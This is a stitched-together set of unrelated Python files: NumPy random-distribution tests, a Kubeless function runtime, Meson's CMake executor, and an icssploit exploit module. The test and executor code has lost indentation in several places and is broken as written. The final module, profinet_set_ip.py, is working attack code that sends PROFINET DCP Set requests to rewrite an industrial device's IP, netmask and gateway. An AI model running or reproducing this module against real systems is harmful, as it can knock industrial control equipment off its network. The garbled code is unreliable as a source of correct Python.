bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([0, 2, 1], dtype=np.int64)
random = Generator(MT19937(self.seed))
neg_binom = random.negative_binomial
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
random = Generator(MT19937(self.seed))
neg_binom = random.negative_binomial
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
lam = [1]
bad_lam_one = [-1]
desired = np.array([0, 0, 3])
random = Generator(MT19937(self.seed))
max_lam = random._poisson_lam_max
bad_lam_two = [max_lam * 2]
poisson = random.poisson
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
desired = np.array([1, 8, 1])
random = Generator(MT19937(self.seed))
zipf = random.zipf
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([1, 1, 3])
random = Generator(MT19937(self.seed))
geometric = random.geometric
actual = geometric(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geometric, bad_p_one * 3)
assert_raises(ValueError, geometric, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [-1]
bad_nsample_two = [4]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_two)
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_two)
random = Generator(MT19937(self.seed))
hypergeom = random.hypergeometric
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
assert_raises(ValueError, hypergeom, -1, 10, 20)
assert_raises(ValueError, hypergeom, 10, -1, 20)
assert_raises(ValueError, hypergeom, 10, 10, -1)
assert_raises(ValueError, hypergeom, 10, 10, 25)
# ValueError for arguments that are too big.
assert_raises(ValueError, hypergeom, 2**30, 10, 20)
assert_raises(ValueError, hypergeom, 999, 2**31, 50)
assert_raises(ValueError, hypergeom, 999, [2**29, 2**30], 1000)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
desired = np.array([1, 1, 1])
random = Generator(MT19937(self.seed))
logseries = random.logseries
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
def test_multinomial(self):
random = Generator(MT19937(self.seed))
actual = random.multinomial([5, 20], [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[0, 0, 2, 1, 2, 0],
[2, 3, 6, 4, 2, 3]],
[[1, 0, 1, 0, 2, 1],
[7, 2, 2, 1, 4, 4]],
[[0, 2, 0, 1, 2, 0],
[3, 2, 3, 3, 4, 5]]], dtype=np.int64)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.multinomial([5, 20], [1 / 6.] * 6)
desired = np.array([[0, 0, 2, 1, 2, 0],
[2, 3, 6, 4, 2, 3]], dtype=np.int64)
assert_array_equal(actual, desired)
class TestThread:
    """Each seed must yield the same stream whether generated in a worker
    thread or serially in the main thread."""

    def setup(self):
        self.seeds = range(4)

    def check_function(self, function, sz):
        from threading import Thread
        threaded_out = np.empty((len(self.seeds),) + sz)
        serial_out = np.empty((len(self.seeds),) + sz)

        # generate in parallel, one thread per seed
        workers = [Thread(target=function, args=(Generator(MT19937(seed)), buf))
                   for seed, buf in zip(self.seeds, threaded_out)]
        for worker in workers:
            worker.start()
        for worker in workers:
            worker.join()

        # generate the identical streams serially
        for seed, buf in zip(self.seeds, serial_out):
            function(Generator(MT19937(seed)), buf)

        # 32-bit Windows threads can change x87 FPU precision mode, so only
        # approximate equality is required there
        if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
            assert_array_almost_equal(threaded_out, serial_out)
        else:
            assert_array_equal(threaded_out, serial_out)

    def test_normal(self):
        def gen_random(state, out):
            out[...] = state.normal(size=10000)
        self.check_function(gen_random, sz=(10000,))

    def test_exp(self):
        def gen_random(state, out):
            out[...] = state.exponential(scale=np.ones((100, 1000)))
        self.check_function(gen_random, sz=(100, 1000))

    def test_multinomial(self):
        def gen_random(state, out):
            out[...] = state.multinomial(10, [1 / 6.] * 6, size=10000)
        self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput:
    """Single-element array arguments must produce shape-(1,) outputs (gh-4263)."""

    def setup(self):
        self.argOne = np.array([2])
        self.argTwo = np.array([3])
        self.argThree = np.array([4])
        self.tgtShape = (1,)

    def test_one_arg_funcs(self):
        probfuncs = (random.geometric, random.logseries)
        funcs = (random.exponential, random.standard_gamma,
                 random.chisquare, random.standard_t,
                 random.pareto, random.weibull,
                 random.power, random.rayleigh,
                 random.poisson, random.zipf,
                 random.geometric, random.logseries)
        for fn in funcs:
            # probability-valued parameters must stay below 1.0
            arg = np.array([0.5]) if fn in probfuncs else self.argOne
            assert_equal(fn(arg).shape, self.tgtShape)

    def test_two_arg_funcs(self):
        probfuncs = (random.binomial, random.negative_binomial)
        funcs = (random.uniform, random.normal,
                 random.beta, random.gamma,
                 random.f, random.noncentral_chisquare,
                 random.vonmises, random.laplace,
                 random.gumbel, random.logistic,
                 random.lognormal, random.wald,
                 random.binomial, random.negative_binomial)
        for fn in funcs:
            # probability-valued parameters must satisfy p <= 1
            second = np.array([0.5]) if fn in probfuncs else self.argTwo
            # array/array, scalar/array and array/scalar combinations
            assert_equal(fn(self.argOne, second).shape, self.tgtShape)
            assert_equal(fn(self.argOne[0], second).shape, self.tgtShape)
            assert_equal(fn(self.argOne, second[0]).shape, self.tgtShape)

    def test_integers(self, endpoint):
        dtypes = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
                  np.int32, np.uint32, np.int64, np.uint64]
        func = random.integers
        high = np.array([1])
        low = np.array([0])
        for dt in dtypes:
            assert_equal(func(low, high, endpoint=endpoint, dtype=dt).shape,
                         self.tgtShape)
            assert_equal(func(low[0], high, endpoint=endpoint, dtype=dt).shape,
                         self.tgtShape)
            assert_equal(func(low, high[0], endpoint=endpoint, dtype=dt).shape,
                         self.tgtShape)

    def test_three_arg_funcs(self):
        for fn in [random.noncentral_f, random.triangular,
                   random.hypergeometric]:
            assert_equal(fn(self.argOne, self.argTwo, self.argThree).shape,
                         self.tgtShape)
            assert_equal(fn(self.argOne[0], self.argTwo, self.argThree).shape,
                         self.tgtShape)
            assert_equal(fn(self.argOne, self.argTwo[0], self.argThree).shape,
                         self.tgtShape)
# ===== file: _kubeless.py =====
#!/usr/bin/env python
import importlib
import io
import os
import queue
import sys

import bottle
import prometheus_client as prom

# The reason this file has an underscore prefix in its name is to avoid a
# name collision with the user-defined module.
current_mod = os.path.basename(__file__).split('.')[0]
if os.getenv('MOD_NAME') == current_mod:
    raise ValueError(f'Module cannot be named {current_mod}')

# Load the user function: /kubeless/<MOD_NAME>.py must define FUNC_HANDLER.
sys.path.append('/kubeless')
mod = importlib.import_module(os.getenv('MOD_NAME'))
func = getattr(mod, os.getenv('FUNC_HANDLER'))

# Environment variables arrive as strings; normalize them to numbers up front.
# Bug fix: FUNC_PORT was previously left as a str whenever the variable was
# set (the int default only applied when it was absent).
func_port = int(os.getenv('FUNC_PORT', 8080))
timeout = float(os.getenv('FUNC_TIMEOUT', 180))
memfile_max = int(os.getenv('FUNC_MEMFILE_MAX', 100*1024*1024))
bottle.BaseRequest.MEMFILE_MAX = memfile_max

# `application` is the conventional name looked up by external WSGI servers.
app = application = bottle.app()

# Static metadata handed to the user function on every invocation.
function_context = {
    'function-name': func.__name__,
    'timeout': timeout,
    'runtime': os.getenv('FUNC_RUNTIME'),
    'memory-limit': os.getenv('FUNC_MEMORY_LIMIT'),
}
class PicklableBottleRequest(bottle.BaseRequest):
    '''Bottle request that can be pickled (serialized).

    `bottle.BaseRequest` is not picklable and therefore cannot be passed directly to a
    python multiprocessing `Process` when using the forkserver or spawn multiprocessing
    contexts. So, we selectively delete components that are not picklable.
    '''

    def __init__(self, data, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Bottle backs the request body with either `io.BytesIO` or
        # `tempfile.TemporaryFile` depending on `MEMFILE_MAX`, and temporary
        # files cannot be pickled — force an in-memory buffer instead.
        self.environ['bottle.request.body'] = io.BytesIO(data)

    def __getstate__(self):
        state = self.environ.copy()
        # Strip the entries that cannot be pickled: the raw WSGI streams and
        # bottle's app/route objects (ConfigDict holds a lambda).
        for unpicklable in ('wsgi.errors', 'wsgi.input',
                            'bottle.app', 'bottle.route', 'route.handle'):
            del state[unpicklable]
        return state

    def __setstate__(self, state):
        self.environ = state
def funcWrap(q, event, c):
    """Run the user function in a child process and ship its result — or the
    exception it raised — back to the parent through queue *q*."""
    try:
        q.put(func(event, c))
    except Exception as err:
        # The parent inspects the queued object with isinstance(.., Exception).
        q.put(err)
@app.get('/healthz')
def healthz():
    """Liveness probe endpoint: always answers the literal string 'OK'."""
    return 'OK'
@app.get('/metrics')
def metrics():
    """Expose the collected Prometheus metrics in the text exposition format."""
    bottle.response.content_type = prom.CONTENT_TYPE_LATEST
    return prom.generate_latest(prom.REGISTRY)
@app.route('/<:re:.*>', method=['GET', 'POST', 'PATCH', 'DELETE'])
def handler():
    """Dispatch an incoming HTTP request to the user function.

    The function runs in a separate process (from the configured
    multiprocessing context) so it can be killed when it exceeds
    FUNC_TIMEOUT; its result comes back through a queue.  Returns the
    function's result, an HTTP 408 on timeout, or re-raises an exception
    raised inside the function.
    """
    # Bug fix: `logging` was only imported under the `__main__` guard, so
    # this handler raised NameError instead of logging the error when the
    # module was served by an external WSGI server via `application`.
    import logging

    req = bottle.request
    data = req.body.read()
    picklable_req = PicklableBottleRequest(data, req.environ.copy())
    if req.get_header('content-type') == 'application/json':
        data = req.json
    event = {
        'data': data,
        'event-id': req.get_header('event-id'),
        'event-type': req.get_header('event-type'),
        'event-time': req.get_header('event-time'),
        'event-namespace': req.get_header('event-namespace'),
        'extensions': {'request': picklable_req}
    }
    method = req.method
    func_calls.labels(method).inc()
    with func_errors.labels(method).count_exceptions():
        with func_hist.labels(method).time():
            q = ctx.Queue()
            p = ctx.Process(target=funcWrap, args=(q, event, function_context))
            p.start()
            try:
                res = q.get(block=True, timeout=timeout)
            except queue.Empty:
                # User function exceeded FUNC_TIMEOUT: kill the worker.
                p.terminate()
                p.join()
                return bottle.HTTPError(408, "Timeout while processing the function")
            else:
                p.join()
                # funcWrap forwards exceptions through the queue; bottle
                # HTTPResponse objects are legitimate return values.
                if isinstance(res, Exception) and not isinstance(res, bottle.HTTPResponse):
                    logging.error("Function returned an exception: %s", res)
                    raise res
                return res
def preload():
    """No-op process target used only to warm up the forkserver."""
    return None
if __name__ == '__main__':
    import logging
    import multiprocessing as mp

    import requestlogger

    # Pick the multiprocessing start method used to run the user function.
    mp_context = os.getenv('MP_CONTEXT', 'forkserver')
    if mp_context == "fork":
        raise ValueError(
            '"fork" multiprocessing context is not supported because cherrypy is a '
            'multithreaded server and safely forking a multithreaded process is '
            'problematic'
        )
    if mp_context not in ["forkserver", "spawn"]:
        raise ValueError(
            f'"{mp_context}" is an invalid multiprocessing context. Possible values '
            'are "forkserver" and "spawn"'
        )

    try:
        ctx = mp.get_context(mp_context)
        if ctx.get_start_method() == 'forkserver':
            # Preload the current module and consequently also the user-defined module
            # so that all the child processes forked from the forkserver in response to
            # a request immediately have access to the global data in the user-defined
            # module without having to load it for every request.
            ctx.set_forkserver_preload([current_mod])
            # Start the forkserver before we start accepting requests.
            d = ctx.Process(target=preload)
            d.start()
            d.join()
    except ValueError:
        # Default to 'spawn' if 'forkserver' is unavailable.
        ctx = mp.get_context('spawn')
        # Fix: logging.warn is a deprecated alias for logging.warning.
        logging.warning(
            f'"{mp_context}" multiprocessing context is unavailable. Using "spawn"'
        )

    func_hist = prom.Histogram(
        'function_duration_seconds', 'Duration of user function in seconds', ['method']
    )
    func_calls = prom.Counter(
        'function_calls_total', 'Number of calls to user function', ['method']
    )
    func_errors = prom.Counter(
        'function_failures_total', 'Number of exceptions in user function', ['method']
    )

    # Log requests in Apache format to stdout.
    loggedapp = requestlogger.WSGILogger(
        app,
        [logging.StreamHandler(stream=sys.stdout)],
        requestlogger.ApacheFormatter(),
    )
    bottle.run(
        loggedapp,
        server='cherrypy',
        host='0.0.0.0',
        port=func_port,
        # Number of requests that can be handled in parallel (default = 30).
        # Fix: cast to int — os.getenv returns a str when the variable is set.
        numthreads=int(os.getenv('CHERRYPY_NUMTHREADS', 30)),
    )
# ===== file: executor.py =====
# Copyright 2019 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This class contains the basic functionality needed to run any interpreter
# or an interpreter-based tool.
import subprocess as S
from pathlib import Path
from threading import Thread
import typing as T
import re
import os
from .. import mlog
from ..mesonlib import PerMachine, Popen_safe, version_compare, MachineChoice, is_windows, OptionKey
if T.TYPE_CHECKING:
from ..environment import Environment
from ..dependencies.base import ExternalProgram
from ..compilers import Compiler
# (returncode, stdout, stderr) triple returned by every CMake invocation;
# stdout/stderr are None when that call mode does not capture them.
TYPE_result = T.Tuple[int, T.Optional[str], T.Optional[str]]
# Memoization key for CMake calls: (cmake path, args, build dir, frozen env).
TYPE_cache_key = T.Tuple[str, T.Tuple[str, ...], str, T.FrozenSet[T.Tuple[str, str]]]
class CMakeExecutor:
# The class's copy of the CMake path. Avoids having to search for it
# multiple times in the same Meson invocation.
class_cmakebin = PerMachine(None, None) # type: PerMachine[T.Optional[ExternalProgram]]
class_cmakevers = PerMachine(None, None) # type: PerMachine[T.Optional[str]]
class_cmake_cache = {} # type: T.Dict[T.Any, TYPE_result]
def __init__(self, environment: 'Environment', version: str, for_machine: MachineChoice, silent: bool = False):
    """Locate a CMake binary for *for_machine* and require at least *version*."""
    self.min_version = version
    self.environment = environment
    self.for_machine = for_machine
    self.cmakebin, self.cmakevers = self.find_cmake_binary(self.environment, silent=silent)
    self.always_capture_stderr = True
    self.print_cmout = False
    self.prefix_paths = [] # type: T.List[str]
    self.extra_cmake_args = [] # type: T.List[str]
    if self.cmakebin is None:
        # No CMake found at all; this executor is unusable.
        return

    if not version_compare(self.cmakevers, self.min_version):
        mlog.warning(
            'The version of CMake', mlog.bold(self.cmakebin.get_path()),
            'is', mlog.bold(self.cmakevers), 'but version', mlog.bold(self.min_version),
            'is required')
        # Too old: treat as not found so callers can fall back gracefully.
        self.cmakebin = None
        return

    # Forward Meson's cmake_prefix_path option to every CMake invocation.
    self.prefix_paths = self.environment.coredata.options[OptionKey('cmake_prefix_path', machine=self.for_machine)].value
    if self.prefix_paths:
        self.extra_cmake_args += ['-DCMAKE_PREFIX_PATH={}'.format(';'.join(self.prefix_paths))]
def find_cmake_binary(self, environment: 'Environment', silent: bool = False) -> T.Tuple[T.Optional['ExternalProgram'], T.Optional[str]]:
    """Return (program, version) for CMake on self.for_machine, or (None, None).

    The search result is memoized in the class attributes so repeated
    executors in the same Meson invocation do not search again.
    """
    from ..dependencies.base import find_external_program, NonExistingExternalProgram

    # Only search for CMake the first time and store the result in the class
    # definition
    if isinstance(CMakeExecutor.class_cmakebin[self.for_machine], NonExistingExternalProgram):
        mlog.debug('CMake binary for %s is cached as not found' % self.for_machine)
        return None, None
    elif CMakeExecutor.class_cmakebin[self.for_machine] is not None:
        mlog.debug('CMake binary for %s is cached.' % self.for_machine)
    else:
        assert CMakeExecutor.class_cmakebin[self.for_machine] is None

        mlog.debug('CMake binary for %s is not cached' % self.for_machine)
        for potential_cmakebin in find_external_program(
                environment, self.for_machine, 'cmake', 'CMake',
                environment.default_cmake, allow_default_for_cross=False):
            # check_cmake returns the version string only for usable binaries.
            version_if_ok = self.check_cmake(potential_cmakebin)
            if not version_if_ok:
                continue
            if not silent:
                mlog.log('Found CMake:', mlog.bold(potential_cmakebin.get_path()),
                         '({})'.format(version_if_ok))
            CMakeExecutor.class_cmakebin[self.for_machine] = potential_cmakebin
            CMakeExecutor.class_cmakevers[self.for_machine] = version_if_ok
            break
        else:
            # for/else: no candidate was usable.
            if not silent:
                mlog.log('Found CMake:', mlog.red('NO'))
            # Cache a NonExistingExternalProgram (rather than None) to signify
            # that we've already searched for it and not found it
            CMakeExecutor.class_cmakebin[self.for_machine] = NonExistingExternalProgram()
            CMakeExecutor.class_cmakevers[self.for_machine] = None
            return None, None

    return CMakeExecutor.class_cmakebin[self.for_machine], CMakeExecutor.class_cmakevers[self.for_machine]
def check_cmake(self, cmakebin: 'ExternalProgram') -> T.Optional[str]:
    """Run ``cmake --version`` and return the parsed version string.

    Returns None (after logging a warning) when the binary is missing,
    cannot be executed, or produces unparsable output.
    """
    if not cmakebin.found():
        mlog.log('Did not find CMake {!r}'.format(cmakebin.name))
        return None
    try:
        p, out = Popen_safe(cmakebin.get_command() + ['--version'])[0:2]
        if p.returncode != 0:
            mlog.warning('Found CMake {!r} but couldn\'t run it'
                         ''.format(' '.join(cmakebin.get_command())))
            return None
    except FileNotFoundError:
        mlog.warning('We thought we found CMake {!r} but now it\'s not there. How odd!'
                     ''.format(' '.join(cmakebin.get_command())))
        return None
    except PermissionError:
        msg = 'Found CMake {!r} but didn\'t have permissions to run it.'.format(' '.join(cmakebin.get_command()))
        if not is_windows():
            msg += '\n\nOn Unix-like systems this is often caused by scripts that are not executable.'
        mlog.warning(msg)
        return None

    # Bug fix: re.search returns None when the output contains no
    # recognizable version line, and `.group(2)` on None would raise
    # AttributeError instead of reporting the problem.
    cm_match = re.search(r'(cmake|cmake3)\s*version\s*([\d.]+)', out)
    if cm_match is None:
        mlog.warning('Found CMake {!r} but failed to parse its version output'
                     ''.format(' '.join(cmakebin.get_command())))
        return None
    return cm_match.group(2)
def set_exec_mode(self, print_cmout: T.Optional[bool] = None, always_capture_stderr: T.Optional[bool] = None) -> None:
    """Update the output-handling flags; a None argument leaves that flag unchanged."""
    for attr, value in (('print_cmout', print_cmout),
                        ('always_capture_stderr', always_capture_stderr)):
        if value is not None:
            setattr(self, attr, value)
def _cache_key(self, args: T.List[str], build_dir: Path, env: T.Optional[T.Dict[str, str]]) -> TYPE_cache_key:
    """Build the hashable key used to memoize CMake invocations."""
    frozen_env = frozenset() if env is None else frozenset(env.items())
    return (self.cmakebin.get_path(), tuple(args), build_dir.as_posix(), frozen_env)
def _call_cmout_stderr(self, args: T.List[str], build_dir: Path, env: T.Optional[T.Dict[str, str]]) -> TYPE_result:
    """Run CMake, echoing stdout to mlog while collecting the CMake trace
    from stderr.

    Returns (returncode, None, raw_trace): stdout is consumed for logging
    only; non-trace stderr lines are surfaced as warnings.
    """
    cmd = self.cmakebin.get_command() + args
    proc = S.Popen(cmd, stdout=S.PIPE, stderr=S.PIPE, cwd=str(build_dir), env=env)  # TODO [PYTHON_37]: drop Path conversion

    # stdout and stderr MUST be read at the same time to avoid pipe
    # blocking issues. The easiest way to do this is with a separate
    # thread for one of the pipes.
    def print_stdout() -> None:
        # Drain stdout line by line until EOF, forwarding each line to mlog.
        while True:
            line = proc.stdout.readline()
            if not line:
                break
            mlog.log(line.decode(errors='ignore').strip('\n'))
        proc.stdout.close()

    t = Thread(target=print_stdout)
    t.start()

    try:
        # Read stderr line by line and log non trace lines
        raw_trace = ''
        # First line of a trace entry looks like "<file>.cmake(<line>):  <func>(...".
        tline_start_reg = re.compile(r'^\s*(.*\.(cmake|txt))\(([0-9]+)\):\s*(\w+)\(.*$')
        inside_multiline_trace = False
        while True:
            line_raw = proc.stderr.readline()
            if not line_raw:
                break
            line = line_raw.decode(errors='ignore')
            if tline_start_reg.match(line):
                raw_trace += line
                # A trace entry continues on subsequent lines until one ends with ' )'.
                inside_multiline_trace = not line.endswith(' )\n')
            elif inside_multiline_trace:
                raw_trace += line
            else:
                # Not part of the trace: surface it as a warning.
                mlog.warning(line.strip('\n'))
    finally:
        proc.stderr.close()

        # Join the reader thread and reap the process before returning.
        t.join()
        proc.wait()

    return proc.returncode, None, raw_trace
def _call_cmout(self, args: T.List[str], build_dir: Path, env: T.Optional[T.Dict[str, str]]) -> TYPE_result:
cmd = self.cmakebin.get_command() + args
proc = S.Popen(cmd, stdout=S.PIPE, stderr=S.STDOUT, cwd=str(build_dir), env=env) # TODO [PYTHON_37]: drop Path conversion
while True:
line = proc.stdout.readline()
if not line:
break
mlog.log(line.decode(errors='ignore').strip('\n'))
proc.stdout.close()
proc.wait()
return proc.returncode, None, None
def _call_quiet(self, args: T.List[str], build_dir: Path, env: T.Optional[T.Dict[str, str]]) -> TYPE_result:
build_dir.mkdir(parents=True, exist_ok=True)
cmd = self.cmakebin.get_command() + args
ret = S.run(cmd, env=env, cwd=str(build_dir), close_fds=False,
stdout=S.PIPE, stderr=S.PIPE, universal_newlines=False) # TODO [PYTHON_37]: drop Path conversion
rc = ret.returncode
out = ret.stdout.decode(errors='ignore')
err = ret.stderr.decode(errors='ignore')
return rc, out, err
def _call_impl(self, args: T.List[str], build_dir: Path, env: T.Optional[T.Dict[str, str]]) -> TYPE_result:
mlog.debug('Calling CMake ({}) in {} with:'.format(self.cmakebin.get_command(), build_dir))
for i in args:
mlog.debug(' - "{}"'.format(i))
if not self.print_cmout:
return self._call_quiet(args, build_dir, env)
else:
if self.always_capture_stderr:
return self._call_cmout_stderr(args, build_dir, env)
else:
return self._call_cmout(args, build_dir, env)
def call(self, args: T.List[str], build_dir: Path, env: T.Optional[T.Dict[str, str]] = None, disable_cache: bool = False) -> TYPE_result:
if env is None:
env = os.environ.copy()
args = args + self.extra_cmake_args
if disable_cache:
return self._call_impl(args, build_dir, env)
# First check if cached, if not call the real cmake function
cache = CMakeExecutor.class_cmake_cache
key = self._cache_key(args, build_dir, env)
if key not in cache:
cache[key] = self._call_impl(args, build_dir, env)
return cache[key]
    def found(self) -> bool:
        """Return True when a usable CMake binary was detected."""
        return self.cmakebin is not None
    def version(self) -> str:
        """Return the version string parsed from ``cmake --version``."""
        return self.cmakevers
    def executable_path(self) -> str:
        """Return the filesystem path of the CMake executable."""
        return self.cmakebin.get_path()
    def get_command(self) -> T.List[str]:
        """Return the full argv list used to invoke CMake."""
        return self.cmakebin.get_command()
    def get_cmake_prefix_paths(self) -> T.List[str]:
        """Return the configured CMake prefix paths."""
        return self.prefix_paths
    def machine_choice(self) -> MachineChoice:
        """Return the machine (build vs. host) this executor is configured for."""
        return self.for_machine
|
profinet_set_ip.py | from icssploit import (
exploits,
print_success,
print_status,
print_error,
validators,
)
import threading
from icssploit.thirdparty import tabulate
from icssploit.protocols.pn_dcp import *
from scapy.arch import get_if_hwaddr
from scapy.sendrecv import sendp, sniff
# Column headers for the device table printed by scan_target_ip().
TABLE_HEADER = ['Device Name', 'Device Type', "MAC Address", "IP Address", "Netmask", "GateWay"]
# Presumably the PROFINET DCP identify multicast address — confirm.
PROFINET_BROADCAST_ADDRESS_1 = '01:0e:cf:00:00:00'
# NOTE(review): this looks like a specific unicast MAC rather than a
# broadcast address — confirm its purpose.
PROFINET_BROADCAST_ADDRESS_2 = "28:63:36:5a:18:f1"
# Discovered devices (not referenced elsewhere in this module).
PROFINET_DEVICES = []
class Exploit(exploits.Exploit):
    """Set a PROFINET device's IP configuration via the PN-DCP protocol.

    Workflow (see run()): identify devices from *target*'s MAC, ask the
    operator to confirm, send a DCP Set request with the new IP settings,
    then re-scan to verify the change took effect.
    """
    __info__ = {
        'name': 'profinet device ip setup',
        'authors': [
            'wenzhe zhu <jtrkid[at]gmail.com>' # icssploit module
        ],
        'description': 'Setup target ip address with PROFINET-DCP protocol.',
        'references': [
        ],
    }
    nic = exploits.Option('eth0', 'Interface Name e.g eth0, en0')
    target = exploits.Option('40:6c:8f:ff:ff:ff', 'Target mac address, e.g. 40:6c:8f:ff:ff:ff',
                             validators=validators.mac)
    target_ip = exploits.Option('192.168.1.100', 'IP Address to set', validators=validators.ipv4)
    target_netmask = exploits.Option('255.255.255.0', 'Network mask to set', validators=validators.ipv4)
    target_gateway = exploits.Option('0.0.0.0', 'Gateway to set', validators=validators.ipv4)
    timeout = exploits.Option(3, 'Timeout for response', validators=validators.integer)
    verbose = exploits.Option(0, 'Scapy verbose level, 0 to 2', validators=validators.integer)
    # MAC address of the local capture interface; filled in by run().
    sniff_mac_address = None
    # Signals that the sniffer thread finished collecting responses.
    sniff_finished = threading.Event()
    # Rows of [name, type, mac, ip, netmask, gateway] from the last scan.
    result = []
    def sniff_answer(self):
        """Sniff DCP responses addressed to us and collect device info rows."""
        self.sniff_finished.clear()
        response = sniff(iface=self.nic, filter="ether dst host %s" % self.sniff_mac_address, timeout=self.timeout)
        self.result = []
        for i in range(len(response)):
            pkt = response[i]
            if pkt[Ether].dst == self.sniff_mac_address:
                Device_Name = ''
                Device_Type = ''
                MAC_Address = pkt[Ether].src
                IP_Address = ''
                Netmask = ''
                GateWay = ''
                # Every response block is optional; fields stay '' when absent.
                if pkt.haslayer(PNDCPIdentDeviceNameOfStationResponseBlock):
                    Device_Name = pkt[PNDCPIdentDeviceNameOfStationResponseBlock].NameOfStation
                if pkt.haslayer(PNDCPIdentDeviceManufacturerSpecificResponseBlock):
                    Device_Type = pkt[PNDCPIdentDeviceManufacturerSpecificResponseBlock].DeviceVendorValue
                if pkt.haslayer(PNDCPIdentIPParameterResponseBlock):
                    IP_Address = pkt[PNDCPIdentIPParameterResponseBlock].IPaddress
                    Netmask = pkt[PNDCPIdentIPParameterResponseBlock].Subnetmask
                    GateWay = pkt[PNDCPIdentIPParameterResponseBlock].StandardGateway
                self.result.append([Device_Name, Device_Type, MAC_Address, IP_Address, Netmask, GateWay])
        self.sniff_finished.set()
    def exploit(self, target_mac):
        """Send a DCP Set request writing ip/netmask/gateway to *target_mac*."""
        packet = Ether(src=self.sniff_mac_address, dst=target_mac, type=0x8892) / \
            ProfinetIO(frameID=0xFEFD) / PNDCPHeader(ServiceID=4, ServiceType=0,
                                                     DCPBlocks=[PNDCPSetRequest(Option=0x01, SubOption=0x02)])
        packet[PNDCPHeader].DCPBlocks[0].DCPBlock = PNDCPSetIPParameterRequestBlock(
            IPaddress=self.target_ip, Subnetmask=self.target_netmask, StandardGateway=self.target_gateway
        )
        sendp(packet, iface=self.nic)
    def scan_target_ip(self, target_mac):
        """Send a DCP Identify request and print the responding devices."""
        # Start the sniffer first so the response is not missed.
        p = threading.Thread(target=self.sniff_answer)
        p.setDaemon(True)
        p.start()
        packet = Ether(src=self.sniff_mac_address, dst=target_mac, type=0x8892) / ProfinetIO(frameID=0xFEFE) / \
            PNDCPHeader(ServiceID=5, ServiceType=0, DCPBlocks=[PNDCPIdentRequest()])
        sendp(packet, iface=self.nic)
        self.sniff_finished.wait(self.timeout + 1)
        # De-duplicate identical device rows before printing.
        unique_device = [list(x) for x in set(tuple(x) for x in self.result)]
        print(tabulate.tabulate(unique_device, headers=TABLE_HEADER))
        print('\n')
    def run(self):
        """Module entry point: scan, confirm with operator, set IP, verify."""
        conf.verb = self.verbose
        self.sniff_mac_address = get_if_hwaddr(self.nic)
        self.scan_target_ip(self.target)
        if len(self.result) == 0:
            print_error("Didn't find any device, please check target mac address.")
            return
        print_status("Please make sure target device info is correct.")
        print_status("Do you want setup target with\n ip address: %s\n network mask: %s\n gateway:%s\n" % (
            self.target_ip, self.target_netmask, self.target_gateway
        ))
        # NOTE(review): raw_input exists only on Python 2; this module appears
        # to target Python 2 — confirm before running under Python 3.
        ans = raw_input("Y/y to confirm, other to cancel.\n:")
        if ans.upper() == "Y":
            self.exploit(target_mac=self.target)
            self.scan_target_ip(self.target)
            # TODO: need some other method to check setup is success or not.
            if len(self.result) == 0:
                print_error("Setup target ip failed.")
                return
            if self.result[0][3] != self.target_ip \
                    or self.result[0][4] != self.target_netmask \
                    or self.result[0][5] != self.target_gateway:
                print_error("Setup target ip failed.")
                return
            else:
                print_success("Setup target ip succeeded")
|
